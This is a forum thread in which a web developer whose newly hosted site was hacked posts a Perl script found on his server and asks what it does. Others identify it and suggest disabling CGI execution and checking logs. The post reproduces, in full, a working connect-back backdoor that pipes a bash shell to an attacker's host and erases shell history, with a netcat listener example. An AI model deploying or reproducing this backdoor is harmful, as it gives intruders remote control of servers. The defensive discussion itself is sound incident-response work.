Site hacked - Linux/Apache... Perl script involved?

Site hacked last Sunday. I changed the password a few times but somehow they got back in on Tuesday. Has been quiet for 24 hours now. I completely changed the password, wiped out all files in the directory, and re-uploaded clean files. Other than a few modified HTML pages, I found the Perl script listed below. I can't read Perl, can anyone make any sense of this? Does it give any clues as to how they got in? Hosting company has been less than helpful, unfortunately.

Thanks,
-Brad

---------------------------------------------------------------------------------------------

#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell          
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                          
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system      = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Brad BansnerWeb DeveloperAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

the__tyrantCommented:
Looks like they somehow manage to upload this to your site - do you have any file uploads in any of your html pages?  if so do those directories allow the execution of perl scripts?  Could we get a bit more info about the setup of your server/site - like does it allow shell accounts?

Seems as though they are sending back a bash shell through netcat (nc -vv -l -p 2121)
netcat: http://netcat.sourceforge.net/

Tell your service provider to turn off perl/cgi scripts in the apache config, unless you need them, and if you do, only allow scripts to be run out of the cgi-bin. (and if you do have an upload file script, make it upload to a directory other than cgi-bin)
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Brad BansnerWeb DeveloperAuthor Commented:
No file uploads in the PHP pages.

I believe the only interactivity is the contact form. Would that be affected if I turn off perl/cgi scripts? Definitely no file upload scripts, though.

If that isn't the case, not sure how they would have gotten the file there, other than by knowing the username/password. This was a brand new hosting account, brand new IP, etc. Was only up for a few days.

I'll check with the hosting provider on some of the other items you mention.

Thanks.
0
the__tyrantCommented:
Well if you've got only php scripts and no perl scripts anywhere, then nothing would be effected.   Not exactly sure...could the username/password be easily cracked? (does the password have special chars like ! or : or whatver else as well as numbers?)

the hosting provider should be worried about this since they are gaining access to a server controlled by them - ask them for the system logs pertaining to your site/user maybe, might shed some more light on how they are getting the script on the server.
0
Challenges in Government Cyber Security

Has cyber security been a challenge in your government organization? Are you looking to improve your government's network security? Learn more about how to improve your government organization's security by viewing our on-demand webinar!

Brad BansnerWeb DeveloperAuthor Commented:
Password is pretty secure. Like I said, this was a brand new account, in within 48 hours it was hacked.

Hosting provider is surprisingly less worried than I thought they would be. Have to break through their first line of tech support, probably.

Thanks for your help.
0
the__tyrantCommented:
Hopefully it gets solved, but in any case i think the best bet would to get the provider to stop disable perl execution on any of your web exposed directories.

Cheers, and good luck with tech support ;)
0
Adam314Commented:
You can probably get the access logs - most hosting providers will give those to you.  Look through this for anything suspicious.

0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Apache Web Server

From novice to tech pro — start learning today.